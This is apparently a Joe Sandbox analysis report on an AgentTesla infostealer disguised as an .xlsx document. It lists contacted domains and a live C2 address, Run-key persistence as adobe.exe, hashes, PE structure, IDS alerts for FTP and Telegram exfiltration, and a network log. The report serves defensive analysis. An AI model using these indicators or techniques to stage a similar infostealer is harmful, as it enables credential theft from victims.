                    https://api.ipify.orgPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cnPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/frere-user.htmlPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.jiyu-kobo.co.jp/PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.galapagosdesign.com/DPleasePRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers8PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fonts.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sandoll.co.krPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.urwpp.deDPleasePRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.zhongyicts.com.cnPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sakkal.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp, PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646648170.0000000005720000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://s4.serv00.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    213.189.52.181
                    s4.serv00.comPoland
                    57367ECO-ATMAN-PLECO-ATMAN-PLtrue
                    172.67.74.152
                    api.ipify.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467356
                    Start date and time:2024-07-04 03:39:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 7s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@11/4@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 308
                    • Number of non-executed functions: 32
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    02:39:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                    02:40:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                    21:39:53API Interceptor9268135x Sleep call for process: PRE ALERT Docs_PONBOM01577.xlsx.exe modified
                    21:40:08API Interceptor7469194x Sleep call for process: adobe.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    213.189.52.181Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                      172.67.74.152242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                      • api.ipify.org/?format=wef
                      K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      stub.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      stub.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                      • api.ipify.org/?format=json
                      Sky-Beta.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/?format=json
                      Sky-Beta.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/?format=json
                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                      • api.ipify.org/?format=json
                      Sky-Beta.exeGet hashmaliciousStealitBrowse
                      • api.ipify.org/?format=json
                      SongOfVikings.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/?format=json
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      s4.serv00.comShip Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                      • 213.189.52.181
                      api.ipify.orgFactura adjunta.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.26.12.205
                      Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.12.205
                      rnoahcrypter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.26.13.205
                      tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.26.13.205
                      19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152
                      SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.13.205
                      9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 172.67.74.152
                      0VcrCVxnMP.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 172.67.74.152
                      E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.26.13.205
                      MzjwuZnJF0.exeGet hashmaliciousGuLoaderBrowse
                      • 104.26.12.205
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ECO-ATMAN-PLECO-ATMAN-PLBOQ_Algeemi_SharePoint_Tender_3768889756.xksx.exeGet hashmaliciousAgentTeslaBrowse
                      • 91.185.189.19
                      http://10f4cf3.wcomhost.com/Get hashmaliciousUnknownBrowse
                      • 85.194.241.205
                      Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                      • 213.189.52.181
                      BOQ_Algeemi_SharePoint_Tender.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                      • 91.185.189.19
                      OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                      • 31.186.83.254
                      Invoice_23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                      • 31.186.83.248
                      WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                      • 77.79.227.218
                      WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                      • 77.79.227.218
                      Invoice 23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                      • 31.186.83.248
                      Invoice 23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                      • 31.186.83.248
                      CLOUDFLARENETUSEncrypted Doc-[izO-3902181].pdfGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      https://click.pstmrk.it/3s/frutilandia.com%2Ffaq%2F/gRC2/yGq2AQ/AQ/a2d2de19-7d91-4f73-a067-0dd3f808145b/1/-HKuJv7KgCGet hashmaliciousHTMLPhisherBrowse
                      • 188.114.96.3
                      https://reservation.exnetehovervs.com/apart/285z92aaza77zGet hashmaliciousUnknownBrowse
                      • 104.22.70.197
                      https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
                      • 162.247.243.29
                      http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12Get hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      Encrypted Doc-[Ogi-5917842].pdfGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                      • 188.114.96.3
                      http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
                      • 172.67.138.117
                      https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
                      • 104.26.10.155
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0ehttps://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://sula.starladeroff.com/Get hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                      • 172.67.74.152
                      http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://supp-review9482.eu/Get hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://ns43q4.csb.app/Get hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://swans-muffin-1id4964-7304421.netlify.app/formGet hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/ront.html?ccsendGet hashmaliciousHTMLPhisherBrowse
                      • 172.67.74.152
                      Factura adjunta.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 172.67.74.152
                      No context
                      Process:C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):757248
                      Entropy (8bit):7.932047193773452
                      Encrypted:false
                      SSDEEP:12288:L5mJwp6Nf+w5yRfOKXLtBgKiOda/M7Drr2vB2Z86a0sXQjrhcEqSqA/UzYbiNhN9:zUCmoBqKiOkU7avgy6mXQ3ShSqA/UkbA
                      MD5:1154CD3205E7E1226B03B1EE15278E0A
                      SHA1:11B53A6D9F81DEFB309A972C3903B1DE976E5911
                      SHA-256:8797EF6CB2E95B65334B38D11068783ACAD3AA173EDE96E152AD66BEB40DEEE3
                      SHA-512:1B1A44971954E8AB8D8A8EADC09F92E2DDF5EA233EACE1134F492983DFE94DCBD454834AC693D0EA2B6730F53DBD59909F3E00189DD5277713D3BE1BBB863DE5
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 24%
                      • Antivirus: Virustotal, Detection: 30%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0.............n.... ........@.. ....................................@.....................................O.......................................T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........z...x..............@............................................0..+........r...prM..p.. ....(.........,....+....+..*..(....... .....(...... . ...(.........(.....*....0..C..........o....o.....+..o....t........o.......o....-....u......,..o......*........."0.......0..C..........o....o.....+..o....t........o.......o....-....u......,..o......*........."0......".( ....*....0..7..........(!.........+.......o"....o#...&...X....i2.........z*........./0.......0..[..........s
                      Process:C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.932047193773452
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:PRE ALERT Docs_PONBOM01577.xlsx.exe
                      File size:757'248 bytes
                      MD5:1154cd3205e7e1226b03b1ee15278e0a
                      SHA1:11b53a6d9f81defb309a972c3903b1de976e5911
                      SHA256:8797ef6cb2e95b65334b38d11068783acad3aa173ede96e152ad66beb40deee3
                      SHA512:1b1a44971954e8ab8d8a8eadc09f92e2ddf5ea233eace1134f492983dfe94dcbd454834ac693d0ea2b6730f53dbd59909f3e00189dd5277713d3be1bbb863de5
                      SSDEEP:12288:L5mJwp6Nf+w5yRfOKXLtBgKiOda/M7Drr2vB2Z86a0sXQjrhcEqSqA/UzYbiNhN9:zUCmoBqKiOkU7avgy6mXQ3ShSqA/UkbA
                      TLSH:C9F4024562DC7FD1E0661FF60D32B01163B4E21AA463EE1D6C9250DD4DA23C7B63AA2F
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............n.... ........@.. ....................................@................................
                      Icon Hash:8c070b0909030f10
                      Entrypoint:0x4acb6e
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6685D385 [Wed Jul 3 22:41:09 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xacb1b0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000xddc4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa9ac00x54.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xaab740xaac00405de6a1e119b0a3f66210249a2ae064False0.9506814490300146data7.945017887436935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xae0000xddc40xde0078cb272f63e5545909d8ce937553f067False0.7673669763513513data7.391753244604948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xbc0000xc0x200d0747cda4a56075e976d32ea0b4265d2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xae1f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.5097517730496454
                      RT_ICON0xae6580x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.3942622950819672
                      RT_ICON0xaefe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3379455909943715
                      RT_ICON0xb00880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.2617219917012448
                      RT_ICON0xb26300x91c8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990085744908896
                      RT_GROUP_ICON0xbb7f80x4cdata0.75
                      RT_VERSION0xbb8440x394OpenPGP Secret Key0.4344978165938865
                      RT_MANIFEST0xbbbd80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                      DLLImport
                      mscoree.dll_CorExeMain
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      07/04/24-03:40:20.785490TCP2029927ET TROJAN AgentTesla Exfil via FTP4974821192.168.2.4213.189.52.181
                      07/04/24-03:40:21.384961TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4974963065192.168.2.4213.189.52.181
                      07/04/24-03:40:13.264826TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4974163983192.168.2.4213.189.52.181
                      07/04/24-03:39:58.804072TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4973663817192.168.2.4213.189.52.181
                      07/04/24-03:40:21.384961TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4974963065192.168.2.4213.189.52.181
                      07/04/24-03:40:12.687826TCP2029927ET TROJAN AgentTesla Exfil via FTP4973921192.168.2.4213.189.52.181
                      07/04/24-03:41:23.727695TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4975163014192.168.2.4213.189.52.181
                      07/04/24-03:39:58.216699TCP2029927ET TROJAN AgentTesla Exfil via FTP4973421192.168.2.4213.189.52.181
                      07/04/24-03:39:58.804072TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4973663817192.168.2.4213.189.52.181
                      07/04/24-03:40:13.264826TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4974163983192.168.2.4213.189.52.181
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 4, 2024 03:39:54.850989103 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:54.851021051 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:54.851094961 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:54.857954025 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:54.857969999 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.363548040 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.363650084 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:55.366081953 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:55.366090059 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.366309881 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.405827045 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:55.418056011 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:55.464492083 CEST44349732172.67.74.152192.168.2.4
